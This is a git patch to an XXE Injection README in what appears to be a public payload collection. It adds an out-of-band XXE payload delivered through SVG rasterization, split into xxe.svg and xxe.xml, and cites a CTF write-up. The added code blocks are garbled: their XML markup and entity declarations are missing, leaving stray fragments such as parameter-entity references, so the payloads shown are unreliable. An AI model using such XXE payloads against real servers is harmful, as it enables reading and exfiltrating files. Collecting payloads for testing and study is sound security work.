From 83f46a22e3d845ddc8d1b106d3236bbc374e2561 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Sat, 2 Nov 2019 00:54:48 +0100
Subject: [PATCH] add XXE via SVG rasterization
---
XXE Injection/README.md | 37 ++++++++++++++++++++++++++++++++++++-
1 file changed, 36 insertions(+), 1 deletion(-)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index d4792dd..ba1bb59 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -364,7 +364,9 @@ Assuming payloads such as the previous return a verbose error. You can start poi
```
-```
+**Classic**
+
+```xml
]>
```
+**OOB via SVG rasterization**
+
+*xxe.svg*
+
+```xml
+
+
+%sp;
+%param1;
+]>
+
+```
+
+*xxe.xml*
+
+```xml
+
+">
+```
+
### XXE inside SOAP
```xml
@@ -479,3 +513,4 @@ updating: xl/sharedStrings.xml (deflated 17%)
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
+- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)